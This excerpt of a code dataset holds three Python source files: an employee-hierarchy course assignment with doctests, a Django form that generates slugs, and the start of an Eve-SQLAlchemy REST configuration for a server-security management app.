self.get_department_leader()\n old_employee = self\n new_leader = \\\n old_employee.create_leader(old_employee.get_department_name2())\n new_employee = old_leader.create_employee()\n new_employee.become_subordinate(new_leader)\n old_leader._remove_subordinate_deep(old_employee)\n for s in old_employee.get_direct_subordinates():\n s.become_subordinate(new_leader)\n for s in old_leader.get_direct_subordinates():\n s.become_subordinate(new_employee)\n if old_leader.get_superior() is not None:\n old_leader.get_superior().remove_subordinate_id(old_leader.eid)\n new_leader.become_subordinate(old_leader.get_superior())\n return new_leader\n\n def become_leader(self, department_name: str) -> Leader:\n \"\"\"Make this Employee the leader of a new department with the\n name .\n\n If this employee is already a leader, change the name of their\n department to .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Employee(2, \"Sue Perior\", \"Manager\", 20000, 30)\n >>> l3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(l3)\n >>> l2 = e2.become_leader(\"Department\")\n >>> l2.get_department_name()\n 'Department'\n >>> l3.get_direct_subordinates()[0].name\n 'Sue Perior'\n >>> e1.get_department_leader().name\n 'Sue Perior'\n >>> l2 = l2.become_leader(\"New Department\")\n >>> l2.get_department_name()\n 'New Department'\n \"\"\"\n new_leader = self.create_leader(department_name)\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_leader)\n if self.get_superior() is not None:\n self.get_superior().remove_subordinate_id(self.eid)\n new_leader.become_subordinate(self.get_superior())\n return new_leader\n\n def get_highest_rated_subordinate(self) -> Employee:\n \"\"\"Return the subordinate of this employee with the highest rating.\n\n Pre-condition: This Employee has at least one subordinate.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e1.get_position_in_hierarchy()\n 'Worker'\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.get_highest_rated_subordinate().name\n 'Sue Perior'\n >>> 
e1.become_subordinate(e3)\n >>> e3.get_highest_rated_subordinate().name\n 'Emma Ployee'\n \"\"\"\n max_rating = -1\n max_employee = None\n for s in self.get_direct_subordinates():\n if s.rating > max_rating: # id order is accounted for with >\n max_rating = s.rating\n max_employee = s\n return max_employee\n\n def swap_up(self) -> Employee:\n \"\"\"Swap this Employee with their superior. Return the version of this\n Employee that is contained in the Organization (i.e. if this Employee\n becomes a Leader, the new Leader version is returned).\n\n Pre-condition: self is not the head of the Organization.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> new_e1 = e1.swap_up()\n >>> isinstance(new_e1, Leader)\n True\n >>> new_e2 = new_e1.get_direct_subordinates()[0]\n >>> isinstance(new_e2, Employee)\n True\n >>> new_e1.position\n 'Manager'\n >>> new_e1.eid\n 1\n >>> e3.get_direct_subordinates()[0] is new_e1\n True\n \"\"\"\n if isinstance(self, Leader):\n new_subordinate = Leader(self.get_superior().eid,\n self.get_superior().name,\n self.position, self.salary,\n self.get_superior().rating,\n self.get_department_name())\n else:\n new_subordinate = Employee(self.get_superior().eid,\n self.get_superior().name,\n self.position, self.salary,\n self.get_superior().rating)\n if isinstance(self.get_superior(), Leader):\n new_superior = Leader(self.eid, self.name,\n self.get_superior().position,\n self.get_superior().salary, self.rating,\n self.get_superior().get_department_name())\n else:\n new_superior = Employee(self.eid, self.name,\n self.get_superior().position,\n self.get_superior().salary, self.rating)\n new_subordinate.become_subordinate(new_superior)\n self.get_superior().remove_subordinate_id(self.eid)\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_subordinate)\n for s in self.get_superior().get_direct_subordinates():\n s.become_subordinate(new_superior)\n if self.get_superior().get_superior() is not None:\n self.get_superior().get_superior().remove_subordinate_id(\n self._superior.eid)\n new_superior.become_subordinate(\n self.get_superior().get_superior())\n return new_superior\n\n def fire_subordinate(self, eid: int) -> None:\n \"\"\"Fire the subordinate of this Employee with ID .\n\n Pre-condition: there is a subordinate of this Employee with ID .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e3.fire_subordinate(2)\n >>> [e.name for e in e3.get_all_subordinates()]\n ['Emma Ployee']\n >>> e1.get_superior().name\n 'Bigg Boss'\n \"\"\"\n for s in self.get_direct_subordinates():\n if s.eid == eid:\n self.remove_subordinate_id(eid)\n for sub in s.get_direct_subordinates():\n sub.become_subordinate(self)\n return\n for s in self.get_direct_subordinates(): # not in direct\n s.fire_subordinate(eid)\n\n def remove_head(self) -> Employee:\n \"\"\"Remove this Employee and replace their position with their highest\n rated direct subordinate. 
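In get_highest_rated_subordinate, the strict > comparison means ties keep the earliest candidate, and since _subordinates is stored in increasing eid order that is the lowest eid. Python's built-in max has the same first-wins tie behaviour, so the loop reduces to a one-liner:

def get_highest_rated_subordinate(self):
    # max returns the first maximal element, matching the strict '>' above:
    # ties are broken in favour of the lowest eid.
    return max(self.get_direct_subordinates(), key=lambda s: s.rating)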
The removed Employee loses all their\n subordinates.\n\n Returns the new head of the organization.\n\n Pre-condition: this Employee is the head of the organization.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e4 = Employee(4, \"Mane Gerr\", \"Manager\", 20000, 25)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e4.become_subordinate(e3)\n >>> e3.remove_head().name\n 'Sue Perior'\n >>> [e.name for e in e2.get_direct_subordinates()]\n ['Emma Ployee', 'Mane Gerr']\n \"\"\"\n new_head = self.get_highest_rated_subordinate()\n self.remove_subordinate_id(new_head.eid)\n new_head.become_subordinate(None)\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_head)\n self._subordinates = []\n return new_head\n\n def obtain_subordinates(self, ids: List[int]) -> Employee:\n \"\"\"Set the employees with IDs in as subordinates of this Employee.\n\n If those employees have subordinates, the superior of those subordinates\n becomes the employee's original superior.\n\n Return this Employee.\n\n Pre-condition: this Employee's id is not in .\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e4 = Employee(4, \"Mane Gerr\", \"Manager\", 20000, 25)\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> e4.become_subordinate(e3)\n >>> e4.obtain_subordinates([2]).name\n 'Mane Gerr'\n >>> [e.name for e in e4.get_all_subordinates()]\n ['Sue Perior']\n >>> [e.name for e in e2.get_all_subordinates()]\n []\n >>> [e.name for e in e3.get_direct_subordinates()]\n ['Emma Ployee', 'Mane Gerr']\n \"\"\"\n for i in ids:\n curr = self.get_organization_head().get_employee(i)\n if curr.get_superior() is None:\n curr.remove_head()\n else:\n curr.get_superior().remove_subordinate_id(curr.eid)\n for s in curr.get_direct_subordinates():\n s.become_subordinate(curr.get_superior())\n curr.become_subordinate(self)\n curr._subordinates = []\n return self\n\n\nclass Organization:\n \"\"\"An Organization: an organization containing employees.\n\n === Private Attributes ===\n _head:\n The head of the organization.\n\n === Representation Invariants ===\n - _head is either an Employee (or subclass of Employee) or None (if there\n are no Employees).\n - No two Employees in an Organization have the same eid.\n \"\"\"\n _head: Optional[Employee]\n\n def __init__(self, head: Optional[Employee] = None) -> None:\n \"\"\"Initialize this Organization with the head .\n\n >>> o = Organization()\n >>> o.get_head() is None\n True\n \"\"\"\n self._head = head\n\n def get_employee(self, eid: int) -> Optional[Employee]:\n \"\"\"\n Return the employee with id . 
If no such employee exists, return\n None.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> o.add_employee(e1)\n >>> o.get_employee(1) is e1\n True\n >>> o.get_employee(2) is None\n True\n \"\"\"\n if self.get_head() is None:\n return None\n if self.get_head().eid == eid:\n return self.get_head()\n return self.get_head().get_employee(eid)\n\n def add_employee(self, employee: Employee, superior_id: int = None) -> None:\n \"\"\"Add to this organization as the subordinate of the\n employee with id .\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.get_head() is e2\n True\n >>> o.add_employee(e1, 2)\n >>> o.get_employee(1) is e1\n True\n >>> e1.get_superior() is e2\n True\n \"\"\"\n if superior_id is None:\n if self.get_head() is not None:\n self.get_head().become_subordinate(employee)\n self._head = employee\n else:\n employee.become_subordinate(self.get_employee(superior_id))\n\n def get_average_salary(self, position: Optional[str] = None) -> float:\n \"\"\"Returns the average salary of all employees in the organization with\n the position .\n\n If is None, this returns the average salary of all employees.\n\n If there are no such employees, return 0.0\n\n >>> o = Organization()\n >>> o.get_average_salary()\n 0.0\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.get_average_salary()\n 15000.0\n \"\"\"\n num = 0\n total = 0\n if self.get_head() is not None:\n for s in merge([self.get_head()],\n self.get_head().get_all_subordinates()):\n if position is None or s.position == position:\n num += 1\n total += s.salary\n if num == 0:\n return 0.0\n return total / num\n\n def get_head(self) -> Optional[Employee]:\n \"\"\"Return the head of the organization, or None if there are no\n employees.\n\n >>> o = Organization()\n >>> o.get_head() is None\n True\n \"\"\"\n return self._head\n\n def get_next_free_id(self) -> int:\n \"\"\"Return the smallest valid id that is not already in the organization.\n\n >>> o = Organization()\n >>> o.get_next_free_id()\n 1\n \"\"\"\n free_id = 1\n while self.get_employee(free_id) is not None:\n free_id += 1\n return free_id\n\n def get_employees_with_position(self, position: str) -> List[Employee]:\n \"\"\"Return a list of employees in the organization with the\n position named in order of increasing eids.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> [e.name for e in o.get_employees_with_position(\"Manager\")]\n ['Sue Perior']\n >>> o.get_employees_with_position(\"CEO\")\n []\n \"\"\"\n result = []\n if self.get_head() is not None:\n result = [s for s in merge([self.get_head()], self.get_head().\n get_all_subordinates()) if s.position\n == position]\n return result\n\n def set_head(self, employee: Employee) -> None:\n \"\"\"If employee is the head of the organization, change\n self._head to department_head.\n\n Otherwise, do nothing.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1.become_subordinate(e2)\n >>> 
o.set_head(e1)\n >>> o.get_head() is None\n True\n >>> o.set_head(e2)\n >>> o.get_head().name\n 'Sue Perior'\n \"\"\"\n if employee.get_superior() is None:\n self._head = employee\n\n def fire_employee(self, eid: int) -> None:\n \"\"\"Fire the employee with ID from the organization.\n\n Pre-condition: there is an employee with the eid in\n the organization.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.fire_employee(2)\n >>> o.get_head().name\n 'Emma Ployee'\n \"\"\"\n if self.get_head().eid == eid:\n self.set_head(self.get_head().remove_head())\n else:\n self.get_head().fire_subordinate(eid)\n\n def _find_lowest_rated_employee(self) -> Employee:\n \"\"\"Return the lowest rated employee in the organization.\n\n Pre-condition: the organization is not empty.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o._find_lowest_rated_employee().name\n 'Sue Perior'\n \"\"\"\n min_rating = 101\n min_employee = None\n for s in merge([self.get_head()],\n self.get_head().get_all_subordinates()):\n if s.rating < min_rating:\n min_rating = s.rating\n min_employee = s\n return min_employee\n\n def fire_lowest_rated_employee(self) -> None:\n \"\"\"Fire the lowest rated employee in the organization.\n\n If this organization is empty, do nothing.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.fire_lowest_rated_employee()\n >>> o.get_head().name\n 'Emma Ployee'\n \"\"\"\n if self.get_head() is not None:\n self.fire_employee(self._find_lowest_rated_employee().eid)\n\n def fire_under_rating(self, rating: int) -> None:\n \"\"\"Fire all employees with a rating below rating.\n\n Employees are be fired in order of increasing rating: the lowest\n rated employees are to be removed first. 
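_find_lowest_rated_employee uses the same pattern with a 101 sentinel (valid ratings are 0-100) and a strict <, so ties again resolve to the lowest eid. The built-in min is equivalent:

def _find_lowest_rated_employee(self):
    employees = merge([self.get_head()],
                      self.get_head().get_all_subordinates())
    # min keeps the first minimum; the merged list is eid-sorted, so ties
    # break by eid exactly as in the explicit loop.
    return min(employees, key=lambda e: e.rating)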
Break ties in order of eid.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 80)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> o.add_employee(e3)\n >>> o.add_employee(e2, 3)\n >>> o.add_employee(e1, 2)\n >>> o.fire_under_rating(75)\n >>> o.get_head().name\n 'Emma Ployee'\n >>> len(o.get_head().get_all_subordinates())\n 0\n \"\"\"\n while self.get_head() is not None and \\\n self._find_lowest_rated_employee().rating < rating:\n self.fire_lowest_rated_employee()\n\n def promote_employee(self, eid: int) -> None:\n \"\"\"Promote the employee with the eid in this organization\n until they have a superior with a higher rating than them or until they\n are the head of the organization.\n\n Precondition: There is an employee in this organization with\n eid .\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> o.add_employee(e3)\n >>> o.add_employee(e2, 3)\n >>> o.add_employee(e1, 2)\n >>> o.promote_employee(1)\n >>> [(e.eid, e.name, e.position, e.salary, e.rating) for e in \\\n o.get_head().get_direct_subordinates()]\n [(1, 'Emma Ployee', 'Manager', 20000, 50)]\n >>> new_e1 = o.get_head().get_direct_subordinates()[0]\n >>> isinstance(new_e1, Leader)\n True\n >>> [(e.eid, e.name, e.position, e.salary, e.rating) for e in \\\n new_e1.get_direct_subordinates()]\n [(2, 'Sue Perior', 'Worker', 10000, 30)]\n \"\"\"\n curr = self.get_employee(eid)\n while curr.get_superior() is not None and \\\n curr.rating >= curr.get_superior().rating:\n curr = curr.swap_up()\n self.set_head(curr)\n\n def get_average_salary_department(self, department: str) -> float:\n \"\"\"Returns the average salary of all employees in the organization in\n department , but not in subdepartment ).\n\n If there are no such employees, return 0.0\n\n >>> o = Organization()\n >>> o.get_average_salary_department(\"Department\")\n 0.0\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 30000, 60, \"Company\")\n >>> o.add_employee(e3)\n >>> o.add_employee(e2, 3)\n >>> o.add_employee(e1, 2)\n >>> o.get_average_salary_department(\"Department\")\n 15000.0\n >>> o.get_average_salary_department(\"Company\")\n 30000.0\n \"\"\"\n num = 0\n total = 0\n if self.get_head() is not None:\n for s in merge([self.get_head()],\n self.get_head().get_all_subordinates()):\n if s.get_department_name2() == department:\n num += 1\n total += s.salary\n if num == 0:\n return 0.0\n return total / num\n\n\nclass Leader(Employee):\n \"\"\"A subclass of Employee. The leader of a department in an organization.\n\n === Private Attributes ===\n _department_name:\n The name of the department this Leader is the head of.\n\n === Inherited Attributes ===\n eid:\n The ID number of the employee. 
Within an organization, each employee ID\n number is unique.\n name:\n The name of the Employee.\n position:\n The name of the Employee's position within the organization.\n salary:\n The salary of the Employee.\n rating:\n The rating of the Employee.\n _superior:\n The superior of the Employee in the organization.\n _subordinates:\n A list of the Employee's direct subordinates (Employees that work under\n this Employee).\n\n === Representation Invariants ===\n - All Employee RIs are inherited.\n - Department names are unique within an organization.\n \"\"\"\n _department_name: str\n\n def __init__(self, eid: int, name: str, position: str, salary: float,\n rating: int, department: str) -> None:\n \"\"\"Initialize this Leader with the ID , name , position\n , salary , rating , and department name\n .\n\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e2.name\n 'Sue Perior'\n >>> e2.get_department_name()\n 'Department'\n \"\"\"\n Employee.__init__(self, eid, name, position, salary, rating)\n self._department_name = department\n\n def get_department_name(self) -> str:\n \"\"\"Return the name of the department this leader is the head of.\n\n Note: This method overrides Employee.get_department_name.\n\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e2.name\n 'Sue Perior'\n >>> e2.get_department_name()\n 'Department'\n \"\"\"\n return self._department_name\n\n def get_department_employees(self) -> List[Employee]:\n \"\"\"Return a list of employees in the leader's department.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(e2)\n >>> e2.become_subordinate(e3)\n >>> [e.name for e in e3.get_department_employees()]\n ['Emma Ployee', 'Sue Perior', 'Bigg Boss']\n >>> [e.name for e in e2.get_department_employees()]\n ['Emma Ployee', 'Sue Perior']\n \"\"\"\n return merge([self], self.get_all_subordinates())\n\n def create_employee(self) -> Employee:\n \"\"\"Create and return a Employee with the same attributes as Leader.\n\n >>> l1 = Leader(1, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e1 = l1.create_employee()\n >>> isinstance(e1, Employee)\n True\n >>> isinstance(e1, Leader)\n False\n >>> e1.name\n 'Sue Perior'\n >>> e1.get_department_name()\n ''\n \"\"\"\n return Employee(self.eid, self.name, self.position, self.salary,\n self.rating)\n\n def become_employee(self) -> Employee:\n \"\"\"Make this Leader an employee.\n\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> l2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> l3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> e1.become_subordinate(l2)\n >>> l2.become_subordinate(l3)\n >>> e2 = l2.become_employee()\n >>> e2.get_department_name()\n 'Company'\n >>> [e.name for e in l3.get_direct_subordinates()]\n ['Sue Perior']\n >>> e1.get_department_leader().name\n 'Bigg Boss'\n \"\"\"\n new_employee = self.create_employee()\n for s in self.get_direct_subordinates():\n s.become_subordinate(new_employee)\n if self.get_superior() is not None:\n self.get_superior().remove_subordinate_id(self.eid)\n new_employee.become_subordinate(self.get_superior())\n return new_employee\n\n\nclass DepartmentSalaryTree:\n \"\"\"A DepartmentSalaryTree: A tree representing the salaries of departments.\n The salaries considered only consist of 
employees directly in a department\n and not in any of their subdepartments.\n\n Do not change this class.\n\n === Public Attributes ===\n department_name:\n The name of the department that this DepartmentSalaryTree represents.\n salary:\n The average salary of the department that this DepartmentSalaryTree\n represents.\n subdepartments:\n The subdepartments of the department that this DepartmentSalaryTree\n represents.\n \"\"\"\n department_name: str\n salary: float\n subdepartments: [DepartmentSalaryTree]\n\n def __init__(self, department_name: str, salary: float,\n subdepartments: List[DepartmentSalaryTree]) -> None:\n \"\"\"Initialize this DepartmentSalaryTree with the department name\n , salary , and the subdepartments\n .\n\n >>> d = DepartmentSalaryTree('Department', 30000, [])\n >>> d.department_name\n 'Department'\n \"\"\"\n self.department_name = department_name\n self.salary = salary\n self.subdepartments = subdepartments[:]\n\n\ndef create_department_salary_tree(organization: Organization) -> \\\n Optional[DepartmentSalaryTree]:\n \"\"\"Return the DepartmentSalaryTree corresponding to .\n\n If has no departments, return None.\n\n Pre-condition: If there is at least one department in ,\n then the head of is also a Leader.\n\n >>> o = Organization()\n >>> e1 = Employee(1, \"Emma Ployee\", \"Worker\", 10000, 50)\n >>> e2 = Leader(2, \"Sue Perior\", \"Manager\", 20000, 30, \"Department\")\n >>> e3 = Leader(3, \"Bigg Boss\", \"CEO\", 50000, 60, \"Company\")\n >>> o.add_employee(e2)\n >>> o.add_employee(e1, 2)\n >>> o.add_employee(e3)\n >>> dst = create_department_salary_tree(o)\n >>> dst.department_name\n 'Company'\n >>> dst.salary\n 50000.0\n >>> dst.subdepartments[0].department_name\n 'Department'\n >>> dst.subdepartments[0].salary\n 15000.0\n \"\"\"\n if organization.get_head() is None or \\\n organization.get_head().get_department_name2() is None:\n return None\n return _create_dst_helper(organization.get_head(), organization)[0]\n\n\ndef _create_dst_helper(employee: Employee, organization: Organization) \\\n -> List[DepartmentSalaryTree]:\n \"\"\"Return the DepartmentSalaryTree corresponding to Employee \n in Organization if Employee is a Leader, otherwise return a\n list of the DepartmentSalaryTrees of Employee 's direct\n subordinates.\n \"\"\"\n department_dst = []\n for s in employee.get_direct_subordinates():\n department_dst.extend(\n _create_dst_helper(s, organization))\n if isinstance(employee, Leader):\n return([DepartmentSalaryTree(employee.get_department_name(),\n organization.get_average_salary_department(\n employee.get_department_name2()),\n department_dst)])\n else:\n return department_dst\n\n\ndef create_organization_from_file(file: TextIO) -> Organization:\n \"\"\"Return the Organization represented by the information in .\n\n >>> o = create_organization_from_file(open('employees.txt'))\n >>> o.get_head().name\n 'Alice'\n \"\"\"\n o = Organization()\n employee_list = []\n subordinate_list = []\n for line in file:\n line = line.replace(\"\\n\", \"\")\n content = line.split(\",\")\n subordinate_list.append(content[5])\n if len(content) == 6:\n employee_list.append(Employee(int(content[0]), content[1],\n content[2], float(content[3]),\n int(content[4])))\n else:\n employee_list.append(Leader(int(content[0]), content[1],\n content[2], float(content[3]),\n int(content[4]), content[6]))\n for i in range(len(employee_list)):\n if subordinate_list[i] == \"\":\n o.set_head(employee_list[i])\n else:\n # superior_employee = None\n # for e in employee_list:\n # if 
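create_organization_from_file above splits each line on commas and reads eid, name, position, salary, rating and the superior's eid, with an optional seventh field naming a department (which makes the row a Leader); an empty superior field marks the organization head. The concrete employees.txt is not shown, so the following is an inferred example consistent with the parser and its doctest:

1,Alice,CEO,50000,60,,Company
2,Bob,Manager,20000,30,1,Department
3,Carol,Worker,10000,50,2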
subordinate_list[i] == e.eid:\n # superior_employee = e\n # employee_list[i].become_subordinate(superior_employee)\n employee_list[i].become_subordinate(_find_employee_with_eid(\n employee_list, int(subordinate_list[i])))\n return o\n\n\ndef _find_employee_with_eid(employee_list: List[Employee], eid: int) \\\n -> Optional[Employee]:\n \"\"\"Find and return the employee in the list with eid ,\n or None if there is no employee with eid .\n \"\"\"\n for e in employee_list:\n if eid == e.eid:\n return e\n return None\n\nif __name__ == \"__main__\":\n import doctest\n\n doctest.testmod()\n\n import python_ta\n\n python_ta.check_all(config={\n 'allowed-import-modules': ['python_ta', 'doctest', 'typing',\n '__future__'],\n 'max-args': 7})\n","sub_path":"organization_hierarchy.py","file_name":"organization_hierarchy.py","file_ext":"py","file_size_in_byte":49086,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"340075410","text":"#\n# farmwork/forms.py\n#\n\nfrom django import forms\nfrom django.utils.text import slugify\nfrom .models import Farmwork\n\n\n# ========================================================\n# FARMWORK FORM\n# ========================================================\n\nclass FarmworkForm(forms.ModelForm):\n\n def __init__(self, *args, **kwargs):\n super(FarmworkForm, self).__init__(*args, **kwargs)\n\n class Meta:\n model = Farmwork\n fields = [\n 'job_role',\n 'job_fruit',\n 'job_pay',\n 'job_pay_type',\n 'job_start_date',\n 'job_duration',\n 'job_duration_type',\n 'job_description',\n 'con_first_name',\n 'con_surname',\n 'con_number',\n 'con_email',\n 'con_description',\n 'acc_variety',\n 'acc_price',\n 'acc_price_type',\n 'acc_description',\n 'loc_street_address',\n 'loc_city',\n 'loc_state',\n 'loc_post_code',\n ]\n\n # --\n # AUTO GENERATE SLUG ON SAVE\n # Credit: https://keyerror.com/blog/automatically-generating-unique-slugs-in-django\n # --\n\n def save(self):\n\n if self.instance.pk:\n return super(FarmworkForm, self).save()\n\n instance = super(FarmworkForm, self).save(commit=False)\n instance.slug = slugify(instance.get_job_fruit_display() + '-' + instance.get_job_role_display() + '-in-' + instance.loc_city)\n instance.save()\n\n return instance\n","sub_path":"backend/apps/farmwork/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":1542,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"14"} +{"seq_id":"274640676","text":"# -*- encoding:utf-8 -*-\nfrom pprint import pprint\nimport os\nfrom eve_sqlalchemy.config import DomainConfig, ResourceConfig\nfrom models.all import *\n\nMY_ROOT_DIR = os.path.dirname(os.path.dirname(os.path.abspath(__file__)))\n\nDEBUG = True\nSQLALCHEMY_DATABASE_URI = 'sqlite:///{}'.format(os.path.join(MY_ROOT_DIR, 'db', 'data.db'))\n# SQLALCHEMY_DATABASE_URI = 'mysql+pymysql://root:@localhost/igdv6'\n\n# SQLALCHEMY_ECHO = True\nSQLALCHEMY_TRACK_MODIFICATIONS = False\n\nEMBEDDING = True # not work\n\nDOMAIN = DomainConfig({\n 'user': ResourceConfig(User),\n 'site': ResourceConfig(Site),\n 'server': ResourceConfig(Server),\n 'module_info': ResourceConfig(ModuleInfo),\n 'midware_info': ResourceConfig(MidwareInfo),\n 'midware_script': ResourceConfig(MidwareScript),\n 'os_info': ResourceConfig(OSInfo),\n 'file_asset': ResourceConfig(FileAsset),\n 'file_sec_action': ResourceConfig(FileSecAction),\n 'file_filter': ResourceConfig(FileFilter),\n 'app_sec_action': ResourceConfig(AppSecAction),\n 'config_file': ResourceConfig(ConfigFile),\n 
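For the FarmworkForm.save override above: django.utils.text.slugify lower-cases the string, keeps alphanumerics, hyphens and underscores, and turns whitespace into hyphens. With illustrative display values (the actual choice labels are not shown in this excerpt):

from django.utils.text import slugify
slugify("Apples" + "-" + "Picker" + "-in-" + "Bundaberg")
# -> 'apples-picker-in-bundaberg'

Note that, unlike the unique-slug recipe credited in the comment, this save adds no uniqueness suffix, so two listings sharing fruit, role and city would produce identical slugs.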
'task': ResourceConfig(Task),\n\n 'log': ResourceConfig(Log),\n 'snapshot': ResourceConfig(SnapShot),\n 'ilocker_rule': ResourceConfig(ILockerRule),\n 'log_rule': ResourceConfig(LogRule),\n 'OpLog': ResourceConfig(OpLog),\n\n}).render()\n\n# attributes with default value need not 'required'\n\nDOMAIN['user']['schema']['tenant_id']['required'] = False\nDOMAIN['user']['schema']['servers']['schema']['data_relation']['embeddable'] = True\nDOMAIN['user']['schema']['sites']['schema']['data_relation']['embeddable'] = True\n\nDOMAIN['server']['schema']['sscan_enabled']['required'] = False\nDOMAIN['server']['schema']['pscan_enabled']['required'] = False\nDOMAIN['server']['schema']['iscan_enabled']['required'] = False\nDOMAIN['server']['schema']['pmac_enabled']['required'] = False\nDOMAIN['server']['schema']['ilocker_enabled']['required'] = False\n\nDOMAIN['site']['schema']['iwall_enabled']['required'] = False\nDOMAIN['site']['schema']['imon_enabled']['required'] = False\nDOMAIN['site']['schema']['sscan_enabled']['required'] = False\nDOMAIN['site']['schema']['pscan_enabled']['required'] = False\nDOMAIN['site']['schema']['iscan_enabled']['required'] = False\nDOMAIN['site']['schema']['pmac_enabled']['required'] = False\nDOMAIN['site']['schema']['ilocker_enabled']['required'] = False\nDOMAIN['site']['schema']['imac_enabled']['required'] = False\n\nDOMAIN['file_sec_action']['schema']['imac_deny_service']['required'] = False\nDOMAIN['file_sec_action']['schema']['ilocker_log_operation']['required'] = False\nDOMAIN['file_sec_action']['schema']['ilocker_deny_write']['required'] = False\nDOMAIN['file_sec_action']['schema']['sscan_deny_sync']['required'] = False\nDOMAIN['file_sec_action']['schema']['action_remove']['required'] = False\nDOMAIN['file_sec_action']['schema']['action_recovery']['required'] = False\nDOMAIN['file_sec_action']['schema']['scan_malicious_link']['required'] = False\nDOMAIN['file_sec_action']['schema']['action_snapshot']['required'] = False\nDOMAIN['file_sec_action']['schema']['scan_trojan']['required'] = 